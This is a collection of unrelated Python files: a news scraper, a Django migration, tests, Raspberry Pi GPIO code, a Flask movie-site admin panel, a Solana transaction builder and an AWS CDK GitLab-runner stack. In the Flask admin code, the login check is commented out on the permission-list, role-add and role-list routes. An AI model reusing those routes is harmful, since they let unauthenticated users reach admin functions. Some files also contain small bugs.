self.cookie_count()
return '\n'.join(text)
@classmethod
def get_rss_feed_list(cls):
"""Returns a list of tuples of feed urls."""
return _ALLFEEDS
if __name__ == '__main__':
rss = RssFeed(FOX_Politics)
scraper = FoxScraper()
print(rss.feed.title)
articles = rss.get_articles()
for a in articles:
print(a.title)
print('='*len(a.title))
print(a.link)
print(a.summary)
print('--begin-body--')
text = scraper.get_article_text(a.link)
print(text)
time.sleep(1)
print('--end-body--')
|
# Generated by Django 3.1.3 on 2021-05-20 18:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('onlinecourse', '0002_auto_20210520_1823'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.question'),
),
migrations.AlterField(
model_name='question',
name='course',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course'),
),
migrations.AlterField(
model_name='submission',
name='choices',
field=models.ManyToManyField(to='onlinecourse.Choice'),
),
]
|
import pytest
from web_error import error
class A404Error(error.NotFoundException):
code = "E404"
message = "a 404 message"
class A401Error(error.UnauthorisedException):
code = "E401"
message = "a 401 message"
class A400Error(error.BadRequestException):
code = "E400"
message = "a 400 message"
class A500Error(error.ServerException):
code = "E500"
message = "a 500 message"
@pytest.mark.parametrize("exc", [
A404Error,
A401Error,
A400Error,
A500Error,
])
def test_marshal(exc):
e = exc("debug_message")
assert e.marshal() == {
"code": "E{}".format(e.status),
"message": e.message,
"debug_message": "debug_message",
}
@pytest.mark.parametrize("exc", [
A404Error,
A401Error,
A400Error,
A500Error,
])
def test_reraise(exc):
e = exc("debug_message")
d = e.marshal()
try:
error.HttpException.reraise(status=e.status, **d)
except error.HttpException as exc:
assert exc.status == e.status
assert exc.marshal() == {
"code": "E{}".format(e.status),
"message": e.message,
"debug_message": "debug_message",
}
|
# Copyright (c) 2019 Jarret Dyrbye
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php
import time
import RPi.GPIO as GPIO
from twisted.internet import threads
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from print import print_green, print_light_blue
COIN_MECH_RELAY = 7
INSERT_CHANGE_LIGHT = 13
class Electrical(object):
def __init__(self, reactor, machine):
self.reactor = reactor
self.machine = machine
self.insert_change_inputs = [0, 0]
self.insert_change_state = 0
#GPIO.add_event_detect(INSERT_CHANGE_LIGHT, GPIO.RISING,
# callback=self.rising, bouncetime=500)
#GPIO.add_event_detect(INSERT_CHANGE_LIGHT, GPIO.FALLING,
# callback=self.falling)
self.machine.set_electrical(self)
#_ = threads.deferToThread(Electrical.set_high)
lc = LoopingCall(self.check_input)
lc.start(1.0)
    @staticmethod
    def setup_gpio():
if GPIO.getmode() != GPIO.BOARD:
GPIO.setmode(GPIO.BOARD)
GPIO.setup(COIN_MECH_RELAY, GPIO.OUT)
GPIO.setup(INSERT_CHANGE_LIGHT, GPIO.IN, pull_up_down=GPIO.PUD_UP)
    @staticmethod
    def flip_delay_flip():
GPIO.output(COIN_MECH_RELAY, GPIO.HIGH)
print("sleeping")
time.sleep(2)
GPIO.output(COIN_MECH_RELAY, GPIO.LOW)
#def set_high():
# GPIO.output(COIN_MECH_RELAY, GPIO.HIGH)
def trigger_coin_mech(self):
print_green("triggering coin mech")
_ = threads.deferToThread(Electrical.flip_delay_flip)
def check_input(self):
r = GPIO.input(INSERT_CHANGE_LIGHT)
#print("check: %s" % r)
self.insert_change_inputs.pop(0)
self.insert_change_inputs.append(r)
assert len(self.insert_change_inputs) == 2
last_input_sum = sum(self.insert_change_inputs)
if last_input_sum == 2:
if self.insert_change_state == 1:
                self.insert_change_state = 0
self.insert_change_turn_off()
elif last_input_sum == 1:
return
elif last_input_sum == 0:
if self.insert_change_state == 0:
                self.insert_change_state = 1
self.insert_change_turn_on()
def insert_change_ambiguous(self):
print("insert change ambiguous")
def insert_change_turn_on(self):
print("insert change on")
self.machine.post_vend_finished()
def insert_change_turn_off(self):
print("insert change off")
#def _both_cb(self, button_no):
# r = GPIO.input(button_no)
# if r:
# reactor.callFromThread(self.falling, button_no)
# else:
# reactor.callFromThread(self.rising, button_no)
def falling(self, button_no):
print_green("electrical falling %s" % button_no)
def rising(self, button_no):
print_green("electrical rising %s" % button_no)
self.machine.post_vend_finished()
|
import math
N = int(input())
X = [0] * N
Y = [0] * N
for i in range(N):
X[i], Y[i] = map(int, input().split())
ans = 0
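# Brute force over all pairs: the answer is the largest Euclidean distance
# between any two of the N points (O(N^2) pairs).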
for i in range(N):
for j in range(i + 1, N):
x1, y1, x2, y2 = X[i], Y[i], X[j], Y[j]
ans = max(ans, math.sqrt(abs(x1 - x2) ** 2 + abs(y1 - y2) ** 2))
print(ans)
|
class TransactionFactory:
def __init__(self, logger):
self.logger = logger
def get_transaction(self, bank_transaction):
"""
return an object HbTransaction or an object derived from him.
"""
raise NotImplementedError
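# Minimal sketch of a concrete factory (HbTransaction and the shape of
# bank_transaction are assumptions, not defined in this module):
#
#   class CsvTransactionFactory(TransactionFactory):
#       def get_transaction(self, bank_transaction):
#           self.logger.debug("building transaction from %s", bank_transaction)
#           return HbTransaction(bank_transaction)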
|
# coding=utf8
import logging
import random
import numpy as np
import tensorflow as tf
from seq2seq_conversation_model import seq2seq_model
_LOGGER = logging.getLogger('track')
def test_tokenizer():
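    # NOTE: fmm_tokenizer is not imported in this file; this test assumes it is
    # provided by the project's tokenizer module (the call in __main__ is commented out).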
words = fmm_tokenizer(u'嘿,机器人同学,你都会些啥?')
for w in words:
print(w)
def test_conversation_model():
"""Test the conversation model."""
with tf.Session() as sess:
print("Self-test for neural conversation model.")
# Create model with vocabularies of 10, 2 small buckets, 2 layers of 32.
model = seq2seq_model.Seq2SeqModel(10, 10, [(3, 3), (6, 6)], 32, 2,
5.0, 32, 0.3, 0.99, num_samples=8)
sess.run(tf.initialize_all_variables())
# Fake data set for both the (3, 3) and (6, 6) bucket.
data_set = ([([1, 1], [2, 2]), ([3, 3], [4]), ([5], [6])],
[([1, 1, 1, 1, 1], [2, 2, 2, 2, 2]), ([3, 3, 3], [5, 6])]
)
for _ in xrange(5): # Train the fake model for 5 steps.
bucket_id = random.choice([0, 1])
encoder_inputs, decoder_inputs, target_weights = model.get_batch(
data_set, bucket_id)
model.step(sess, encoder_inputs, decoder_inputs, target_weights,
bucket_id, False)
a, b, c = model.step(sess, encoder_inputs, decoder_inputs,
target_weights,
bucket_id, True)
print (c)
c = np.array(c)
print (c.shape)
outputs = [np.argmax(logit, axis=1) for logit in c]
print (outputs)
if __name__ == "__main__":
# test_tokenizer()
test_conversation_model()
|
from pathlib import Path
def write_schemas(schemas, directory):
for i, schema in enumerate(schemas):
filename = Path(directory) / schema.filepath.lstrip("/")
filename.parent.mkdir(parents=True, exist_ok=True)
if i == 0:
target_filename = filename
with open(filename, "wb") as f:
f.write(schema.schema)
return target_filename
|
from flask import render_template, redirect, url_for, flash, session, request, g, abort
from functools import wraps
from app.admin.forms import LoginForm, AdminForm, RoleForm, AuthForm, MovieForm, TagForm, PreviewForm
from app.models import Admin, Tag, Movie, Preview, User, Comment, Moviecol, Oplog, Adminlog, Userlog, Auth, Role
from app import db, app
from . import admin
import os, uuid
from datetime import datetime
from werkzeug.utils import secure_filename
def change_filename(filename):
"""
    Rename a file: build a unique name from a timestamp plus a random uuid hex, keeping the extension.
"""
fileinfo = os.path.splitext(filename)
filename = datetime.now().strftime("%Y%m%d%H%M%S") + str(uuid.uuid4().hex) + fileinfo[-1]
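    # e.g. "poster.jpg" -> "20210520182400<32-char uuid hex>.jpg"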
return filename
def admin_login_req(f):
"""
    Decorator that requires an admin login.
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if "admin" not in session:
return redirect(url_for("admin.login", next=request.url))
return f(*args, **kwargs)
return decorated_function
@admin.before_request
def before_request():
g.logo = "mtianyan.jpg"
@admin.route("/")
@admin_login_req
def index():
"""
    Admin home page (system management).
"""
g.logo = "mtianyan.jpg"
return render_template("admin/index.html")
@admin.route("/pwd/", methods=["GET", "POST"])
@admin_login_req
def pwd():
"""
    Admin password change.
"""
return 'pwd'
@admin.route("/login/", methods=["GET", "POST"])
def login():
"""
    Admin login.
"""
    form = LoginForm()
if form.validate_on_submit():
data = form.data
admin = Admin.query.filter_by(name=data["account"]).first()
if admin:
            # check_pwd returns False for a wrong password, so "not check_pwd(data["pwd"])" is True here.
if not admin.check_pwd(data["pwd"]):
flash("密码错误!", "err")
return redirect(url_for("admin.login"))
else:
flash("账户不存在!", "err")
return redirect(url_for("admin.login"))
        # Credentials are correct: store the login in the session.
session["admin"] = data["account"]
session["admin_id"] = admin.id
# admin = Admin.query.filter_by(name=session["admin"]).first()
# g.logo = "mtianyan.jpg"
        # A possible way to implement the admin avatar: store the current admin's avatar info in the session.
adminlog = Adminlog(
admin_id=admin.id,
ip=request.remote_addr,
)
db.session.add(adminlog)
db.session.commit()
return redirect(request.args.get("next") or url_for("admin.index"))
return render_template("admin/login.html", form=form)
@admin.route("/logout/")
@admin_login_req
def logout():
"""
    Admin logout.
"""
session.pop("admin", None)
session.pop("admin_id", None)
return redirect(url_for("admin.login"))
@admin.route("/tag/add/", methods=["GET", "POST"])
@admin_login_req
def tag_add():
"""
    Add a tag.
"""
form = TagForm()
g.logo = "mtianyan.jpg"
if form.validate_on_submit():
data = form.data
tag = Tag.query.filter_by(name=data["name"]).count()
        # The tag already exists.
if tag == 1:
flash("标签已存在", "err")
return redirect(url_for("admin.tag_add"))
tag = Tag(
name=data["name"]
)
db.session.add(tag)
db.session.commit()
oplog = Oplog(
admin_id=session["admin_id"],
ip=request.remote_addr,
reason="添加标签%s" % data["name"]
)
db.session.add(oplog)
db.session.commit()
flash("标签添加成功", "ok")
redirect(url_for("admin.tag_add"))
return render_template("admin/tag_add.html", form=form)
@admin.route("/tag/list/<int:page>/", methods=["GET"])
@admin_login_req
def tag_list(page=None):
"""
    Tag list.
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = Tag.query.order_by(
Tag.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("admin/tag_list.html", page_data=page_data)
@admin.route("/tag/edit/<int:id>", methods=["GET", "POST"])
@admin_login_req
# @admin_auth
def tag_edit(id=None):
"""
    Edit a tag.
"""
g.logo = "mtianyan.jpg"
form = TagForm()
form.submit.label.text = "修改"
tag = Tag.query.get_or_404(id)
if form.validate_on_submit():
data = form.data
tag_count = Tag.query.filter_by(name=data["name"]).count()
        # The name is already taken by another tag, so this edit would create a duplicate.
if tag.name != data["name"] and tag_count == 1:
flash("标签已存在", "err")
return redirect(url_for("admin.tag_edit", id=tag.id))
tag.name = data["name"]
db.session.add(tag)
db.session.commit()
flash("标签修改成功", "ok")
redirect(url_for("admin.tag_edit", id=tag.id))
return render_template("admin/tag_edit.html", form=form, tag=tag)
@admin.route("/tag/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def tag_del(id=None):
"""
    Delete a tag.
"""
tag = Tag.query.filter_by(id=id).first_or_404()
db.session.delete(tag)
db.session.commit()
flash("标签<<{0}>>删除成功".format(tag.name), "ok")
return redirect(url_for("admin.tag_list", page=1))
@admin.route("/movie/add/", methods=["GET", "POST"])
@admin_login_req
def movie_add():
"""
    Add-movie page.
"""
form = MovieForm()
if form.validate_on_submit():
data = form.data
file_url = secure_filename(form.url.data.filename)
file_logo = secure_filename(form.logo.data.filename)
if not os.path.exists(app.config["M_DIR"]):
            # Create the directory tree (including parents).
os.makedirs(app.config["M_DIR"])
            os.chmod(app.config["M_DIR"], 0o755)  # mode must be an int; the original passed the string "rw"
url = change_filename(file_url)
logo = change_filename(file_logo)
        # Save the uploaded files.
form.url.data.save(app.config["M_DIR"] + url)
form.logo.data.save(app.config["M_DIR"] + logo)
        # url and logo are the stored filenames of the uploaded video and image.
movie = Movie(
title=data["title"],
url=url,
info=data["info"],
logo=logo,
star=int(data["star"]),
playnum=0,
commentnum=0,
tag_id=int(data["tag_id"]),
area=data["area"],
            release_time=data["release_time"],
length=data["length"]
)
db.session.add(movie)
db.session.commit()
flash("添加电影成功!", "ok")
return redirect(url_for('admin.movie_add'))
g.logo = "mtianyan.jpg"
return render_template("admin/movie_add.html", form=form)
@admin.route("/movie/list/<int:page>/", methods=["GET"])
@admin_login_req
def movie_list(page=None):
"""
    Movie list page.
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
    # Join with Tag: filter_by is for single-table queries; multi-table joins declare the related columns with filter.
page_data = Movie.query.join(Tag).filter(
Tag.id == Movie.tag_id
).order_by(
Movie.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/movie_list.html", page_data=page_data)
@admin.route("/movie/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def movie_edit(id=None):
"""
    Edit-movie page.
"""
return 'movie/edit'
@admin.route("/movie/del/<int:id>/", methods=["GET"])
@admin_login_req
def movie_del(id=None):
"""
    Delete a movie.
"""
return 'movie/del'
@admin.route("/preview/add/", methods=["GET", "POST"])
@admin_login_req
def preview_add():
"""
    Add a coming-soon preview.
"""
g.logo = "mtianyan.jpg"
form = PreviewForm()
if form.validate_on_submit():
data = form.data
file_logo = secure_filename(form.logo.data.filename)
if not os.path.exists(app.config["P_DIR"]):
os.makedirs(app.config["P_DIR"])
# os.chmod(app.config["P_DIR"], "rw")
logo = change_filename(file_logo)
form.logo.data.save(app.config["P_DIR"] + logo)
preview = Preview(
title=data["title"],
logo=logo
)
db.session.add(preview)
db.session.commit()
flash("添加预告成功!", "ok")
return redirect(url_for('admin.preview_add'))
return render_template("admin/preview_add.html", form=form)
@admin.route("/preview/list/<int:page>/", methods=["GET"])
@admin_login_req
def preview_list(page=None):
"""
    Preview list.
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = Preview.query.order_by(
Preview.addtime.desc()
).paginate(page=page, per_page=5)
return render_template("admin/preview_list.html", page_data=page_data)
@admin.route("/preview/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def preview_edit(id):
"""
    Edit a preview.
"""
g.logo = "mtianyan.jpg"
form = PreviewForm()
    # The next line disables the "cover must not be empty" validation when editing.
form.logo.validators = []
preview = Preview.query.get_or_404(int(id))
if request.method == "GET":
form.title.data = preview.title
if form.validate_on_submit():
data = form.data
if form.logo.data != "":
file_logo = secure_filename(form.logo.data.filename)
preview.logo = change_filename(file_logo)
form.logo.data.save(app.config["P_DIR"] + preview.logo)
preview.title = data["title"]
db.session.add(preview)
db.session.commit()
flash("修改预告成功!", "ok")
return redirect(url_for('admin.preview_edit', id=id))
return render_template("admin/preview_edit.html", form=form, preview=preview)
@admin.route("/preview/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def preview_del(id=None):
"""
    Delete a preview.
"""
return 'preview/del'
@admin.route("/user/list/<int:page>/", methods=["GET"])
@admin_login_req
def user_list(page=None):
"""
    Member list.
"""
g.logo = "mtianyan.jpg"
if page is None:
page = 1
page_data = User.query.order_by(
User.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/user_list.html", page_data=page_data)
@admin.route("/user/view/<int:id>/", methods=["GET"])
@admin_login_req
def user_view(id=None):
"""
    View member details.
"""
from_page = request.args.get('fp')
if not from_page:
from_page = 1
user = User.query.get_or_404(int(id))
return render_template("admin/user_view.html", user=user, from_page=from_page)
@admin.route("/user/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def user_del(id=None):
"""
    Delete a member.
"""
    # Deleting removes an item from the current page; if it was the last page, that page no longer exists, so step back one page.
from_page = int(request.args.get('fp')) - 1
    # Handle the case where everything is deleted and there is no page to step back to (0 is falsy).
if not from_page:
from_page = 1
user = User.query.get_or_404(int(id))
db.session.delete(user)
db.session.commit()
flash("删除会员成功!", "ok")
return redirect(url_for('admin.user_list', page=from_page))
@admin.route("/comment/list/<int:page>/", methods=["GET"])
@admin_login_req
def comment_list(page=None):
"""
    Comment list.
"""
if page is None:
page = 1
    # Join comments with their related Movie and User,
    # then filter so Movie.id matches the comment's movie_id and User.id matches its user_id.
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == Comment.movie_id,
User.id == Comment.user_id
).order_by(
Comment.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/comment_list.html", page_data=page_data)
@admin.route("/comment/del/<int:id>/", methods=["GET"])
@admin_login_req
def comment_del(id=None):
"""
    Delete a comment.
"""
    # Deleting removes an item from the current page; if it was the last page, step back one page.
from_page = int(request.args.get('fp')) - 1
    # Handle the case where everything is deleted (0 is falsy).
if not from_page:
from_page = 1
comment = Comment.query.get_or_404(int(id))
db.session.delete(comment)
db.session.commit()
flash("删除评论成功!", "ok")
return redirect(url_for('admin.comment_list', page=from_page))
@admin.route("/moviecol/list/<int:page>/", methods=["GET"])
@admin_login_req
def moviecol_list(page=None):
"""
    Movie favorites list.
"""
if page is None:
page = 1
page_data = Moviecol.query.join(
Movie
).join(
User
).filter(
Movie.id == Moviecol.movie_id,
User.id == Moviecol.user_id
).order_by(
Moviecol.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/moviecol_list.html", page_data=page_data)
@admin.route("/moviecol/del/<int:id>/", methods=["GET"])
@admin_login_req
def moviecol_del(id=None):
"""
    Delete a favorite.
"""
    # Deleting removes an item from the current page; if it was the last page, step back one page.
from_page = int(request.args.get('fp')) - 1
    # Handle the case where everything is deleted (0 is falsy).
if not from_page:
from_page = 1
moviecol = Moviecol.query.get_or_404(int(id))
db.session.delete(moviecol)
db.session.commit()
flash("删除收藏成功!", "ok")
return redirect(url_for('admin.moviecol_list', page=from_page))
@admin.route("/oplog/list/<int:page>/", methods=["GET"])
@admin_login_req
def oplog_list(page=None):
"""
    Operation log management.
"""
if page is None:
page = 1
page_data = Oplog.query.join(
Admin
).filter(
Admin.id == Oplog.admin_id,
).order_by(
Oplog.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("admin/oplog_list.html", page_data=page_data)
@admin.route("/adminloginlog/list/<int:page>/", methods=["GET"])
@admin_login_req
def adminloginlog_list(page=None):
"""
    Admin login log.
"""
if page is None:
page = 1
page_data = Adminlog.query.join(
Admin
).filter(
Admin.id == Adminlog.admin_id,
).order_by(
Adminlog.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/adminloginlog_list.html", page_data=page_data)
@admin.route("/userloginlog/list/<int:page>/", methods=["GET"])
@admin_login_req
def userloginlog_list(page=None):
"""
    Member login log list.
"""
if page is None:
page = 1
page_data = Userlog.query.join(
User
).filter(
User.id == Userlog.user_id,
).order_by(
Userlog.addtime.desc()
).paginate(page=page, per_page=2)
return render_template("admin/userloginlog_list.html", page_data=page_data)
@admin.route("/auth/add/", methods=["GET", "POST"])
@admin_login_req
def auth_add():
"""
    Add a permission.
"""
form = AuthForm()
if form.validate_on_submit():
data = form.data
auth = Auth(
name=data["name"],
url=data["url"]
)
db.session.add(auth)
db.session.commit()
flash("添加权限成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/auth_add.html", form=form)
@admin.route("/auth/list/<int:page>/", methods=["GET"])
# @admin_login_req
def auth_list(page=None):
"""
    Permission list.
"""
if page is None:
page = 1
page_data = Auth.query.order_by(
Auth.addtime.desc()
).paginate(page=page, per_page=10)
g.logo = "mtianyan.jpg"
return render_template("admin/auth_list.html", page_data=page_data)
@admin.route("/auth/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
# @admin_auth
def auth_edit(id=None):
"""
    Edit a permission.
"""
return 'auth/edit'
@admin.route("/auth/del/<int:id>/", methods=["GET"])
@admin_login_req
# @admin_auth
def auth_del(id=None):
"""
    Delete a permission.
"""
return 'auth/del'
@admin.route("/role/add/", methods=["GET", "POST"])
# @admin_login_req
def role_add():
"""
    Add a role.
"""
form = RoleForm()
if form.validate_on_submit():
data = form.data
role = Role(
name=data["name"],
auths=",".join(map(lambda v: str(v), data["auths"]))
)
db.session.add(role)
db.session.commit()
flash("添加角色成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/role_add.html", form=form)
@admin.route("/role/list/<int:page>/", methods=["GET"])
# @admin_login_req
def role_list(page=None):
"""
    Role list.
"""
if page is None:
page = 1
page_data = Role.query.order_by(
Role.addtime.desc()
).paginate(page=page, per_page=10)
g.logo = "mtianyan.jpg"
return render_template("admin/role_list.html", page_data=page_data)
@admin.route("/role/edit/<int:id>/", methods=["GET", "POST"])
@admin_login_req
def role_edit(id=None):
"""
    Edit a role.
"""
return 'role/edit'
@admin.route("/role/del/<int:id>/", methods=["GET"])
@admin_login_req
def role_del(id=None):
"""
    Delete a role.
"""
return 'role/del'
@admin.route("/admin/add/", methods=["GET", "POST"])
@admin_login_req
def admin_add():
"""
    Add an administrator.
"""
form = AdminForm()
from werkzeug.security import generate_password_hash
if form.validate_on_submit():
data = form.data
admin = Admin(
name=data["name"],
pwd=generate_password_hash(data["pwd"]),
role_id=data["role_id"],
is_super=1
)
db.session.add(admin)
db.session.commit()
flash("添加管理员成功!", "ok")
g.logo = "mtianyan.jpg"
return render_template("admin/admin_add.html", form=form)
@admin.route("/admin/list/<int:page>/", methods=["GET"])
@admin_login_req
def admin_list(page=None):
"""
    Administrator list.
"""
if page is None:
page = 1
page_data = Admin.query.join(
Role
).filter(
Role.id == Admin.role_id
).order_by(
Admin.addtime.desc()
).paginate(page=page, per_page=1)
return render_template("admin/admin_list.html", page_data=page_data) |
from anthill.framework.forms import Form
from anthill.framework.utils.translation import translate as _
|
from unittest import TestCase
import requests
class EmailTest(TestCase):
@classmethod
def setUpClass(cls):
cls.request = requests.Session()
cls._url = 'http://localhost:8000/api/v1/email/'
def test_email_valid(self):
data = {
"email": "[email protected]",
"name": "Aradhya"
}
response = self.request.post(self._url, data=data)
self.assertEqual(response.status_code, 201)
def test_email_invalid(self):
data = {
"email": "testemail",
"name": "someone"
}
response = self.request.post(self._url, data=data)
self.assertEqual(response.status_code, 400)
def tearDown(self):
pass
|
from __future__ import annotations
from dataclasses import dataclass
from base58 import b58encode
from .keypair import Keypair
from .publickey import PublicKey
from nacl.signing import VerifyKey
from nacl.exceptions import BadSignatureError
from .core.instructions import Instruction, AccountMeta
from .core.message import (
Message,
MessageHeader,
CompiledInstruction,
encode_length
)
PACKET_DATA_SIZE = 1232
@dataclass
class PKSigPair:
public_key: PublicKey
signature: bytes | None = None
class Transaction:
def __init__(self, **config):
self.fee_payer: PublicKey = config.get("fee_payer")
self.nonce_info = config.get("nonce_info")
self.recent_blockhash = config.get("recent_blockhash")
self.signers: list[Keypair] = config.get("signers")
self.instructions: list[Instruction] = []
self.signatures: list[PKSigPair] = []
if "instructions" in config:
instructions: Instruction = config.get("instructions")
if (
type(instructions) is list and
isinstance(instructions[0], Instruction)
):
self.instructions.extend(config["instructions"])
else:
raise TypeError((
"instructions keyword argument"
"must be a list of Instruction objects"
))
    def compile_transaction(self) -> bytes:
if self.nonce_info:
self.recent_blockhash = self.nonce_info.nonce
if not self.instructions:
raise AttributeError("No instructions provided.")
if not self.recent_blockhash:
raise AttributeError("Recent blockhash not provided.")
if not self.signatures:
raise AttributeError("No signatures found in the transaction.")
if not self.fee_payer:
self.fee_payer = self.signatures[0].public_key
account_metas: list[AccountMeta] = []
program_ids: list[str] = []
for instruction in self.instructions:
if not instruction.program_id:
raise AttributeError(
"Invalid instruction (no program ID found): ",
instruction
)
account_metas.extend(instruction.keys)
if str(instruction.program_id) not in program_ids:
program_ids.append(str(instruction.program_id))
for program_id in program_ids:
account_metas.append(AccountMeta(
public_key=PublicKey(program_id),
is_signer=False,
is_writable=False
))
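        # Sort signer accounts before non-signers and, within each group, writable
        # accounts before read-only ones (False sorts before True).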
account_metas.sort(key=lambda account: (
not account.is_signer, not account.is_writable))
fee_payer_idx = 0
seen: dict[str, int] = {}
uniq_metas: list[AccountMeta] = []
for sig in self.signatures:
public_key = str(sig.public_key)
if public_key in seen:
uniq_metas[seen[public_key]].is_signer = True
else:
uniq_metas.append(AccountMeta(sig.public_key, True, True))
seen[public_key] = len(uniq_metas) - 1
if sig.public_key == self.fee_payer:
fee_payer_idx = min(fee_payer_idx, seen[public_key])
for a_m in account_metas:
public_key = str(a_m.public_key)
if public_key in seen:
idx = seen[public_key]
uniq_metas[idx].is_writable = uniq_metas[idx].is_writable or a_m.is_writable
else:
uniq_metas.append(a_m)
seen[public_key] = len(uniq_metas) - 1
if a_m.public_key == self.fee_payer:
fee_payer_idx = min(fee_payer_idx, seen[public_key])
if fee_payer_idx == 1:
uniq_metas = [AccountMeta(self.fee_payer, True, True)] + uniq_metas
else:
uniq_metas = (
[uniq_metas[fee_payer_idx]] + uniq_metas[:fee_payer_idx] +
uniq_metas[fee_payer_idx + 1:]
)
signed_keys: list[str] = []
unsigned_keys: list[str] = []
num_required_signatures = num_readonly_signed_accounts = num_readonly_unsigned_accounts = 0
for a_m in uniq_metas:
if a_m.is_signer:
signed_keys.append(str(a_m.public_key))
num_required_signatures += 1
num_readonly_signed_accounts += int(not a_m.is_writable)
else:
num_readonly_unsigned_accounts += int(not a_m.is_writable)
unsigned_keys.append(str(a_m.public_key))
if not self.signatures:
self.signatures = [PKSigPair(public_key=PublicKey(
key), signature=None) for key in signed_keys]
account_keys: list[str] = signed_keys + unsigned_keys
account_indices: dict[str, int] = {
str(key): i for i, key in enumerate(account_keys)}
compiled_instructions: list[CompiledInstruction] = [
CompiledInstruction(
accounts=[account_indices[str(a_m.public_key)]
for a_m in instr.keys],
program_id_index=account_indices[str(instr.program_id)],
data=b58encode(instr.data),
)
for instr in self.instructions
]
message: Message = Message(
MessageHeader(
num_required_signatures=num_required_signatures,
num_readonly_signed_accounts=num_readonly_signed_accounts,
num_readonly_unsigned_accounts=num_readonly_unsigned_accounts,
),
account_keys,
compiled_instructions,
self.recent_blockhash,
)
serialized_message: bytes = message.serialize()
return serialized_message
def sign(self) -> None:
def to_public_key(signer: PublicKey | Keypair) -> PublicKey:
if isinstance(signer, Keypair):
return signer.public_key
elif isinstance(signer, PublicKey):
return signer
else:
raise TypeError(("The argument must be either "
"PublicKey or Keypair object."))
pk_sig_pairs: list[PKSigPair] = [PKSigPair(
public_key=to_public_key(signer)
) for signer in self.signers]
self.signatures = pk_sig_pairs
sign_data = self.compile_transaction()
for idx, signer in enumerate(self.signers):
signature = signer.sign(sign_data).signature
if len(signature) != 64:
raise RuntimeError(
"Signature has invalid length: ",
signature
)
self.signatures[idx].signature = signature
def verify_signatures(self, signed_data: bytes | None = None) -> bool:
if signed_data is None:
signed_data: bytes = self.compile_transaction()
for sig_pair in self.signatures:
if not sig_pair.signature:
return False
try:
VerifyKey(bytes(sig_pair.public_key)).verify(
signed_data, sig_pair.signature)
except BadSignatureError:
return False
return True
def serialize(self) -> bytes:
if not self.signatures:
raise AttributeError("Transaction has not been signed.")
sign_data: bytes = self.compile_transaction()
if not self.verify_signatures(sign_data):
raise AttributeError("Transaction has not been signed correctly.")
if len(self.signatures) >= 64 * 4:
raise AttributeError("Too many signatures to encode.")
wire_transaction = bytearray()
signature_count = encode_length(len(self.signatures))
wire_transaction.extend(signature_count)
for sig_pair in self.signatures:
if sig_pair.signature and len(sig_pair.signature) != 64:
raise RuntimeError(
"Signature has invalid length: ", sig_pair.signature
)
if not sig_pair.signature:
wire_transaction.extend(bytearray(64))
else:
wire_transaction.extend(sig_pair.signature)
wire_transaction.extend(bytearray(sign_data))
if len(wire_transaction) > PACKET_DATA_SIZE:
raise RuntimeError(
"Transaction too large: ",
len(wire_transaction)
)
return bytes(wire_transaction)
def add_instructions(self, *instructions: Instruction) -> None:
for instr in instructions:
if not isinstance(instr, Instruction):
raise ValueError(
"Argument not an instruction object: ",
instr
)
self.instructions.append(instr)
|
from json import load
import pip._vendor.requests as requests
from aws_cdk import (
core,
aws_ec2 as ec2,
aws_iam as iam,
aws_route53 as r53
)
# This AMI is for the ap-northeast-1 region:
# amzn-ami-hvm-2016.09.0.20160923-x86_64-gp2
# Find this computer's public IP.
external_ip = requests.get('https://checkip.amazonaws.com').text.rstrip()
# Change this to your Route 53 hosted zone ID.
my_hosted_zone = "ZZZZZZZZ_HOST_ZONE_ID"
# Change this to your Route 53 zone name.
my_zone_name = "ROUTE53_DOMAIN_ID"
# This computer's public IP in CIDR notation.
your_public_ip = str(external_ip + "/32")
# Change this to your EC2 key pair name.
my_key_pair = "eksworker"
with open("./user_data/user_data_system_manager.sh") as f:
userdata = f.read()
class VpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# The code that defines your stack goes here
# vpc = ec2.Vpc.from_lookup(self,'vpc',vpc_name="eksctl-Cloudteam-cluster/VPC" )
prj_name = self.node.try_get_context("token")
shellCommands = ec2.UserData.for_linux()
shellCommands.add_commands("yum update -y")
shellCommands.add_commands("yum install docker -y")
shellCommands.add_commands("usermod -aG dokcer ec2-user")
shellCommands.add_commands("systemctl start docker")
shellCommands.add_commands("systemctl enable docker")
shellCommands.add_commands(
"docker run -d -v /home/ec2-user/.gitlab-runner:/etc/gitlab-runner -v /var/run/docker.sock:/var/run/docker.sock --name gitlab-runner-register gitlab/gitlab-runner:alpine register --non-interactive --url https://gitlab.com./ --registration-token " + prj_name + " --docker-volumes \"/var/run/docker.sock:/var/run/docker.sock\" --executor docker --docker-image \"alpine:latest\" --description \"Docker Runner\" --tag-list \"demo,runner,cdk\" --docker-privileged")
shellCommands.add_commands(
"sleep 2 && docker run -d -v /home/ec2-user/.gitlab-runner:/etc/gitlab-runner -v /var/run/docker.sock:/var/run/docker.sock --name gitlab-runner gitlab/gitlab-runner:alpine")
vpc = ec2.Vpc.from_lookup(self, 'vpc', is_default=True)
